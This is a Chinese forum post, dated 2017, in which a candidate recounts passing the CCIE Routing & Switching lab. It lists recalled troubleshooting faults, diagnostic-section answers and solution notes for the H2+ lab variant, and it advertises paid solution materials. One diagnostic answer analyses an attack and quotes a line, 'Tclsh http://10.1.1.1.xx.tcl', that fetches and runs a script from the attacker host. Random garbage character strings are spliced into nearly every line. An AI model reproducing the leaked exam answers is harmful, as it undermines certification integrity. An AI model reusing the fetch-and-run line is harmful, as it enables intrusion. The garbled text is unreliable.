- 积分
- 154
- 鸿鹄币
- 个
- 好评度
- 点
- 精华
- 最后登录
- 1970-1-1
- 阅读权限
- 20
- 听众
- 收听
助理工程师
|
恭喜「冰风」同志拿到CCIE证书,以下战报分享,希望能帮助大家。祝愿大家都能拿到CCIE号码。
C3 d* Z9 A$ y( L# y2 l$ y% c5 D% C& {+ d x+ ?9 q; Q9 a
# W9 v# y) o' p% o2 u# }; q
TS1 DIAG3++ H2+
0 C" T/ z6 M. B: V: A6 |! P" [6 l6 o. C( x7 p3 o
先说说总体感觉:8 A9 x# n2 U# J& r- n
这次北京只有3个人考试,1个无线,2个RS,我如愿抽到了H2+,另外一个人我提前15分钟交卷时,他还在做,图是H2的图,估计是H2+。所以抽到H2+的几率很大,准备后面考试的兄弟姐妹还是做好H2+的充分准备再上场。
' q2 \( p8 h/ {: A5 [5 HTS1比较简单,尤其是前面几题,错点很少。考前挺担心TS的,尤其是第一题,可以出的错点其实非常多,3月有个朋友网络经验很足,第一题排了半个多小时,整个TS花了两个半小时,那时候lab没出变种,对lab影响不大。现在抽到变种的几率很大,如果TS花的时间太长,对lab影响就很大了。而且TS节省的时间,可以全部加到lab上,也就是说lab时间是可以超过5个半小时。我是提前半小时结束TS,从10点开始做lab,一直到3点45都没提示我交卷,也没有倒计时。& Q0 O" @9 i: N8 ?
诊断比较幸运的是,考前2天看战报才了解到有DIAG3++, 备考的诊断资料里都没有提到,幸亏当时记了一下答案。所以考前2天多看战报是很重要的,要是挂在诊断上,岂不是太冤了。
, n7 Z+ U6 N/ g) P. \5 @0 h! U# Z9 Klab抽到H2+, 心情有点小复杂。考前我是带有检验H2+解法的任务来到北京的,前面用我们解法去考H2+的两个兄弟都挂了,大家对解法都不是很有信心。所以做完诊断,还是挺期待抽到H2+的,一方面前面半个月一直在准备变种,另一方面TS和诊断还比较顺利,节约了不少时间给lab。这次能顺利通过,得特别感谢新认识的群友小刘,是他考前2天把我拉到一个新群,让我了解到一个重要的解法:后门用路由拆分(BGP Deaggregate)来实现;和一个重要的新需求:R55/R56不能下放172.0.0.0/8路由到PE,还有其它一些考点的解法讨论,包括如何实现负载等等,让我受益匪浅。! V, O4 P$ z/ `) c) v @
「欢迎大家关注微信公众号『CCIE战报』,最新最全的战报我会即时更新。」
3 F6 P# w |7 o) C- v0 a「大家想看历史战报可以点击战报-历史目录,战报都是大家血与泪走过来的,希望能帮助大家。」/ h- g" T1 b; [) {
「题主整理了H2+的所有需求和解法以及预配IOU,挂出售卖,希望能给大家节省时间,也能减轻我经济负担。」9 D8 | y% [/ r+ j; J
「大家不想花钱或者不信任题主的,可以私聊题主,将更新前整理的资料分享给你,虽有偏差,但也能覆盖百分之八十,你在酌情考虑。」
. r" h! z" T% a) M; D1 ]" E「最后,这个战报很详细,大家好好观看,先匿了,祝你顺风。」
9 O8 f% B8 z! |TS1:
" C8 n+ J$ h; ~; k1)两个交换机vlan12是down的,添加vlan12后出现象;5 A; K/ _, h! r: d: R) w
2)PPP常规错点,删掉R17的ppp auth chap callout,添加ppp ipcp route default,把用户名和密码重新刷一遍后出现象;, B2 e, ^( M- w$ Q8 A: L J
3)OSPF,R21的e2/0有cost,删掉,R3有两条123.5.5.5的静态(应该影响到是mpls那题),删掉;8 Q j. T) I1 V, U4 ~$ V
4)eigrp,R13有个接口有delay,删掉,验证现象时图上的metric是1703,所以还要把4个路由器的eigrp都刷上metric weight 0 1 1 1 1 1;
9 a. E& x' |' h. L! B5)BGP,极其简单,R12添加max-path 2出现象,可能R22还有个下一跳问题,记不清了,反正错点很少;! H( `% n- L( l7 u5 e$ B
6)DMVPN,常规错点,把4个tunnel的配置对一遍,然后ping R19不通,查看R19的s4/0有acl控制,加一条permit ip any any(应该还有更精细的加法)。加密也有个小错,记不清了。R15还要添加no ip split eigrp 200和no ip next-hop-self eigrp 200。# n j& L/ a3 |) y
7)ipv6,常规错点,R22的route-map下一跳错,R25没有宣告XX:XX:XX:25::/64! ~) m" [! {& H0 l5 p. T
8)MPLS,错点稍多,R8的接口漏配nat,R3,R4,R5,R6的RT错,R3的125网段没有宣告,R4/R6的标签断裂问题等,虽然稍多,但都是我们平时练习到的。按照思路逐步排查,不难。/ C+ X# ]$ b O$ \. e4 z
9)DMVPN+NAT, R23貌似nat有个小错,因为开始R24 ping R7的外网口不通,排查后通了。检查R24和R7的tunnel配置,把两端的加密去掉后,出ospf邻居成功建立的信息,说明加密有问题,R7的第一阶段加密没有配group,加上后ok;2 b# C2 I% q4 F+ ~' M
10)NAT+DNS, R23的DHCP mac地址配错$ f8 b( f9 e( o# o/ N3 _6 l
总体TS还是算简单的,第6第8是4个point的分值,其它都是2个point,多花点时间在这2题上。- K' m$ E' c! T2 E
- I' L* K9 @$ p [5 g: m
DIAG3++:' s# W) o6 ]; h% c
DHCP snooping S& I0 @' N* X8 F6 v
q1 抓包 看了一下 找DHCP包 源是0.0.0.0 选114
; K" L$ O/ ?" Z* kq2 单选题 选 sourse ip add is 0.0.0.02 y8 ~+ J: f0 w, `6 \
q3 sw1-sw3
" n# L' @5 S" G黑客攻击:$ J c8 H) O2 O3 b$ ^3 m, m6 Z
抓包信息看tcp三次握手信息,判断10.1.1.2是受害者,10.1.1.1是黑客
' e0 J# l2 r) n9 v7 J1 T5 `5 xq1:8选4) P2 X8 G: n1 j+ x0 S; O
1)TCP connection to 10.1.1.1
: u1 T7 ?8 C+ J- I z2)script downloaded from 10.1.1.1 + U8 I# j2 n7 X7 g
3)hacker from a remote host to 10.1.1.2 on port 1337
- G2 _' F( p$ I( t/ w) U4)ransomware installed by backdoor
, Q6 v. i- i# Gq2: sudo poweroff
- T' U* _& J; L O$ wq3: Tclsh http://10.1.1.1.xx.tcl
6 Q. K& J- M- ?$ t6 C' [这题我有点小纠结,因为有个类似的选项:http://10.1.1.2.xx.tcl.
% s7 Z) h- e% `1 ^" C$ @" h" L+ f% U1 p( c$ v7 X' L
H2+:
1 B0 ?; G; ?5 b, L6 |1)这里我要重点说一下L2的问题,考前一直听说考场H2+的L2存在大bug,多人碰到做完bund,vlan173,184会down,很多人是通过no掉spanning的一些配置来解决的,这样做的结果只能是fail,而且最后反映的L2的得分都很低。考前我对L2的问题也很犯悚,因为不知道为什么会这样,自己在模拟器一直没这种情况。幸亏考前我们在机构版本室再现了这个问题,SW3和SW5做完bund,直接出接口errdisable的信息,errdisable的原因是bgduguard。我们拉来机构老师一起分析,推测原因是:在定义channel-group的时候,在某些IOS版本里,portchannel35和portchannel46没有继承物理链路的中继配置(swi mode trunk),默认还是access,如果SW3和SW5不是相同的版本,就会出现一侧(SW3)是trunk, 一侧(SW5)是/ ^$ I- \" Q m2 f4 E" x- p8 \
access,这时bpduguard就会起作用了,SW3一发bpdu,SW5的接口就会errdisable,造成vlan173起不来的现象。
: d' B0 j J6 ~6 ^( D解决办法:
; f8 e; k j& V6 U% i在SW3和SW5建portchannel时,两边都把物理接口shutdown,建好portchannel后,确认portchannel的配置是否和物理链路一致,都是trunk,如果portchannel里配置是空的,配上swi tr en do/swi mo tr,之后再把两边接口no shut。; _: a0 Z* m$ _
考场我就是这么做的,没有出任何问题,当然我也是步步小心,整个L2花了我40分钟时间。$ l! h) l* x- t, \$ _+ F( w, l- I; ?- A
2)R17/R19/R20/R21的vrf解法,我就不说了,各机构都有,唯一区别的是有的机构解法里,没有配area 51 stub,理由是要传10.2.0.0/16汇总到area 51。其实配了area 51 stub,也能传,只是R17不能配成stub no-summary。另外提醒一下,配完tunnel以后,R19/R20/R20都把对方的路由前缀trace几次,确保只有1跳,不经过hub,路由表的相应前缀前会多一个%。 O% v- o4 F( U x+ H
3)OSPF的配置没什么说的,DC区域没有预配,不能用network,不能有2类LSA;其他几个65002区域,OSPF预配都有,只需要在SW1,SW2里passive掉vlan100(题目没要求,属于优化配置)' j( H( f# v& o+ ^
4)EIGRP要用64bit命名方式,要解决L052(bandwidth 1K)进路由表的问题,没有限制刷K值还是改rib-scale,推荐用rib-scale,因为用rib-scale=153,出来的metic和现象图里一模一样。& {* |- v3 \, o4 N# `
5)BGP CE配置,R15/R16汇总10.0.0.0/8,并要下发默认到PE,我用的是network 0.0.0.0。重分布要注意,OSPF重分布到BGP时,用redistribute ospf 1就可以了,后面什么也别跟,他的作用就是在bgp里产生明细,使汇总生效就可以了。R11/R12/R13/R14和老版本一样。验证时要注意,现象图里的as号是65001 65002,不是原来的65001 65001。说明以前通过as-override的方式不行了,要在CE上配nei XXX allowas-in。* p( ] A# n+ V4 }. o2 S1 a7 B% F; D
6)BGP PE配置,防环没限制方式,用SOO最简单
5 |( p% T/ Z# s8 h; c; y, x- p7)R9和R10的防环,有一堆限制,用distance ospf ext 171可以实现" [& T# s; G0 l7 I8 p
8)重点来了,R18和R57之间的后门,我仔细看了几遍需求,agg+summary only是明确的,但没有说只能放一条前缀到对端,理论上用反抑制列表和路由拆分都可以。推荐用路由拆分,防止需求理解错了。这里推荐做个优化:R18 BGP重分布到OSPF时,做个过滤,只放2个前缀过去:172.0.0.0/8和172.18.1.0/24;同理R57上BGP重分布到EIGRP时,只放2个前缀过去:10.0.0.0/8和10.2.100.0/24;我在配完所有配置,检查现象的时候,发现一个奇怪的问题,R18收到了R57回传的10.0.0.0/8,因为这条路由比不过R18汇总产生的10.0.0.0/8,也不影响现象,我因为时间有点紧张,就没有再做优化。建议有时间还是做个优化比较好。
$ N* x! b8 |* ], P0 q' I9)R55/R56也是容易犯错的地方,单纯实现题目的需求不难,但要实现题目隐含的后门需求,还是要做一番优化的。首先要把10.0.0.0/8的路由过滤掉,不能回传给PE;其次172.0.0.0/8这条路由,要看需求,最早的变种只是要求不能在R55/R56做汇总,那时是可以放172.0.0.0/8到PE,并传给DC区域,这样在DC区域要做的优化是在R15/R16上改OSPF的重分布type为OE1,以达到DC区域优选R15/R16方向的172.0.0.0/8的目的;现在新的需求是,不允许把172.0.0.0/8传到PE,这样势必要把172.0.0.0/8这条路由也过滤掉,同时把172.0.0.0/8 le 32这段的明细都下放给PE,并传到DC区域,这样在DC区域要做的优化就变了,要在R18上改OSPF的重分布type为OE1,以达到DC区域访问172.18.1.0/24优选R18的后门链路;其他还有172.17.x.x的路由,经过双点双向重分布,也要防止回传给PE;过滤的方法有很多种,要理解它们的不同点,比如可以在eigrp重分布到bgp的时候过滤,也可以在nei PE后面加过滤,但对这个场景,必须在重分布的时候过滤,我这里不说原因,备考的同学自己要想明白为什么,我说一下在nei PE后门加过滤的现象:SW10的10.0.0.0/8路由,刚开始是优选R55/R56方向(这是正确的方向),过段时间就会变成优选R57方向。SW10重启SVI口后,会短暂恢复到优选R55/R56方向,之后还是会回到R57方向。
# i8 ^" S9 w) J0 b7 V9 D关于SW10的10.0.0.0/8路由,要实现优选R55/R56方向,最简单的方法是R57重分布的时候设置的K值,与R55/R56重分布的时候设置的K值,完全一样。因为SW10与R55/R56之间是SVI接口,和R57之间是eth口,SVI接口本身就比eth口的delay小,在K值设置相同的情况下,自然就会优选R55/R56方向。: P) H9 H2 Z8 X$ p5 |9 L: `
10)做完以上配置,路由互通就差不多完成了,接着就是验证路由是否与现象图完全一致:" X8 F" M9 Z( K; s+ M
a. R101 trace 172.18.1.254
% _5 \% b/ p. b4 ]/ S4 J==>走后门
) E( \8 A1 C/ I. ~% G3 ^b. R101 trace 172.18.2.2545 x. J% M B2 y" K ]' e" n c
==>走MPLS区域 {( D+ N& {' k5 t0 V6 W
c. SW10带源trace 10.2.100.100# T. r: M8 ~5 L
==>走后门. j, k( `% K0 x: O
d. SW10 trace 10.2.101.253- R* X. ~# ?5 t7 r7 n7 T
==>走MPLS区域,全负载,但只走R3,不走R4(意味着不需要在R50/R51配maxpath ibgp 2)。如果碰到第3跳开始不负载,有两个方法解决:一个是在R50/R51的e0/0配:ip load-share per-packet;还有一个是在R50/R51的e0/1上配:no ip route-cache cef;两个方法任选一个都行。如果配了这两条还不负载,不要怀疑方法,一定是路由有问题。我考场就碰到了,当时立马有点头晕,冷静下来考虑是不是有条路本身就不通,看trace的路径,走的是R10,把R10的e0/1断开再trace,果然不通了。因为考场有预配mpls,我就没配,检查了几台设备的mpls配置,觉得很花时间,索性把所有设备的mpls重新刷了一遍。刷完就通了,负载现象也出来了。强烈推荐mpls即使有预配也全部重新刷一遍。2 W' U8 [- V: g7 |" \! x* Z* D# B
e. SW1/SW2 trace 10.2.100.100( v' W7 ?! { f. c
==>走mpls区域,全负载,一条路径走R3,一条路径走R4,不需要做任何配置,这个选路是BGP选路原则第8条起作用,所以配maxpath是不起作用的。不负载一定是BGP配的有问题。6 J8 P0 D: @! Z3 v% x4 Y" ]
11)最后验证后门切换,R18上断开e0/0接口,把上面的a,b,c,d再跑一遍。都要能跑通,走MPLS。我在平时练的时候,这个切换要花2分钟以上,丢十几个包后才通。考场不知道为什么,切换极快,丢几个包就通了。没有时间细究到底什么原因。反倒是切换回来挺花时间的,好像路由拆分要花一段时间路由明细才出来。9 P( R7 W, p* o _0 [5 k
12)组播要注意一点,因为题目要求R19带source e0/1 ping组播地址,这时候R19就不是源了,而是最后一跳路由器,所以所有的组播配置都要在R19上配。这和H2不同,H2是明确要求SW3没有任何组播配置,但能ping通组播地址,这是因为SW3没有带source ping。+ k5 v7 n# t$ W+ R. @
13)其他的ipv6和feature就没什么说的了,有些需求的小变化,解起来不难。, N% {$ P6 Y) {; N: u! q. F
14)最后提一点,我在平时练习的时候就发现,只要同时配了HSRPv6和DHCP snooping,R101就ping不出去了(地址还是能拿到),SW3同时也会变的很不稳定。我在考场的时候也担心出现这个问题,所以我一直没配DHCP snooping,把所有配置都验证完以后,才配的DHCP snooping,结果果然拿到地址后ping 8.8.8.8就开始丢包了,5个包丢了3个。接着SW3就出现TRC=XX这类平时我们认为模拟器挂了的信息。看来正如题目要求的,需要解决广播风暴的问题。这个好像我还没看到有好的解决方案,只在SW6上的e1/0上配了一条ip dhcp snooping limit rate 10,但显然没起什么作用。幸好SW3 reload以后,所有路由都恢复了,还顺便验证了一把track的配置。此时还剩半个小时,赶紧花了十几分钟用SW4和所有站点都验证了一遍路由,没问题就赶紧交卷了。
P7 m$ @' Q' b5 I
: B$ }& o2 v* n% b 这次能顺利通过,需要感谢的人很多,机构的老师,一起备考的同学,各位无私分享的群友,等等,还要感谢考官,没怎么tr我,貌似就是shut down了我几个接口,还让我们提前10分钟进入考场进行考试。所以建议备考的同学当天最好提前半小时到场,能提前考试总是有帮助的。/ M# i" J( ]1 C( v( B
3 J0 N# k/ _4 ?# `: q+ X
& a+ S4 s5 {0 P0 x6 W3 \4 Z
, N; r; P1 B V! U0 T3 ]# l; p/ q) Z2 }1 O8 c# o3 s
|
|
简体中文
英语
日语
韩语
法语
西班牙语
越南语
泰语
阿拉伯语
俄语
葡萄牙语
德语
意大利语
希腊语
荷兰语
波兰语
保加利亚语
爱沙尼亚语
丹麦语
芬兰语
捷克语
罗马尼亚语
斯洛文尼亚语
瑞典语
匈牙利语
繁体中文
文言文
发表于 2017-5-7 11:09:39
置顶卡
喧嚣卡
变色卡
千斤顶
